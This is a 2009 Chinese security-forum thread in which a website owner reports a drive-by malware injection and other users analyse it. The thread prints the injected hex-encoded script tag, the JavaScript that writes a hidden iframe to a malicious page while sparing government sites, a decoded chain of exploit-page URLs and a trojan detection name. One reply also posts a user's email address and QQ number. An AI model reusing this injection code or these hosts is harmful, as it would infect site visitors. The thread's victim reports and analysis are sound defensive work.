瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 网站被挂马,指向这上<script src=http://%77%76%67%32%2E%63%6E><
不写是不是也可以 - 2009-5-11 15:05:00
<script src=http://%77%76%67%32%2E%63%6E></script>

这是被加的代码 <script src=http://%77%76%67%32%2E%63%6E></script>

是指向一个统计的,我想,打开一看,是一个


if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=http://dadasdsadsa.3322.org/a/a7.htm></iframe>")
document.write("</div>")}


http://dadasdsadsa.3322.org/a/a7.htm

这个是自己申请的,在

<html>
<iframe src="cnzz.htm" width=111 height=0 border=0></iframe>
<br>
<br>
<br>
<br>
<br>
<script type="text/javascript">
var allok=Math.floor(Math.random()*10000);if((allok>9000))
document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.cn.yahoo.com\/1081870\/ystat.js\"><\/script><noscript><a href=\"http:\/\/tongji.cn.yahoo.com\"><img src=\"http:\/\/img.tongji.cn.yahoo.com\/1081870\/ystat.gif\"\/><\/a><\/noscript>");

</script>
<script src="http://s23.cnzz.com/stat.php?id=1408290&web_id=1408290" language="JavaScript" charset="gb2312"></script>

谁 能帮我找到这个统计的主人的, 我要举报他

另外,问一下是不是到网监处就可以举报,
希望这些经常给别人网站挂马的得到惩罚!

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
不写是不是也可以 - 2009-5-11 15:18:00
可以看出来 ="http://www.cnzz.com 这里注册的统计
商道网络 - 2009-5-12 10:50:00
我也中了这招,删除了这行就没事了,但没几天又让他给挂了,真是无聊。
谁有办法警告他一下,告诉我一声,谢谢了。
我的邮箱:13306336915@189.cn
QQ:51155591
网址:www.sugdo.com
lqqk7 - 2009-5-12 23:54:00
Domain Name: wvg2.cn
ROID: 20090427s10001s57612152-cn
Domain Status: ok
Registrant Organization: 百度百度
Registrant Name: 百度
Administrative Email: example@hotmail.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server:dns29.hichina.com
Name Server:dns30.hichina.com
Registration Date: 2009-04-27 19:49
Expiration Date: 2010-04-27 19:49


很明显,域名注册信息全部是虚假的
只能确定域名注册机构是万网,域名持有者在更改DNS解析的时候必然要登录万网的域名后台管理,也许后台日志会留下些蛛丝马迹,但个人恐怕无从查证了...........
也只有举报到公安机关去调查了
清水_无忧 - 2009-5-14 9:54:00
http://jjxp1.cn/a/xx.htm
http://jjxp1.cn/a/02.htm
21.38.24版本的木马入侵拦截可以拦截以上两个地址
幸福耗子 - 2009-5-14 10:32:00
关于:hxxp://wvg2.cn/解密的日志(全体输出 -  21):

Level  0>http://wvg2.cn/
Level  1>http://jjxp1.cn/a/a7.htm
Level  2>http://jjxp1.cn/a/cnzz.htm
Level  3>http://jjxp1.cn/a/rkkk.js
Level  4>http://jjxp1.cn/a/bf.htm
Level  5>http://jjxp1.cn/a/bf.js
Level  6>http://xin89221.com/love/windoss.css
Level  5>http://jjxp1.cn/a/bf1.js
Level  4>http://jjxp1.cn/a/lz.htm
Level  3>http://jjxp1.cn/a/reee.js
Level  4>http://jjxp1.cn/a/real.html
Level  4>http://jjxp1.cn/a/real.htm
Level  5>http://jjxp1.cn/a/re11.js
Level  5>http://jjxp1.cn/a/real.js
Level  3>http://jjxp1.cn/a/02.htm
Level  4>http://jjxp1.cn/a/set.js
Level  3>http://jjxp1.cn/a/office.htm
Level  3>http://jjxp1.cn/a/xx.htm
Level  3>http://jjxp1.cn/a/flash.htm
Level  3>http://jjxp1.cn/a/kk.htm
Level  2>http://s23.cnzz.com/stat.php?id=1408290&web_id=1408290

此网址由幸福的耗子解密(本人博客www.mouse0232.com)
清水_无忧 - 2009-5-20 15:20:00
攻击说明: 返回漏洞下载木马
名称:Suspicious.ShellCode.Exploit
  木马网站利用了缓冲区溢出漏洞。缓冲区溢出是由编程错误引起的。如果缓冲区被写满,而程序没有去检查缓冲区边界,也没有停止接收数据,这时缓冲区溢出就会发生,溢出代码利用者利用溢出构造特殊的溢出代码,使得程序返回到溢出者期望的位置执行溢出者定义的代码,来实现木马下载和运行的目的。
艾玛 - 2009-5-20 15:31:00
Trojan.Spy.Win32.Bancos.fdk:kaka6:


艾玛 - 2009-5-20 15:34:00
像个下载器
1
查看完整版本: 网站被挂马,指向这上<script src=http://%77%76%67%32%2E%63%6E><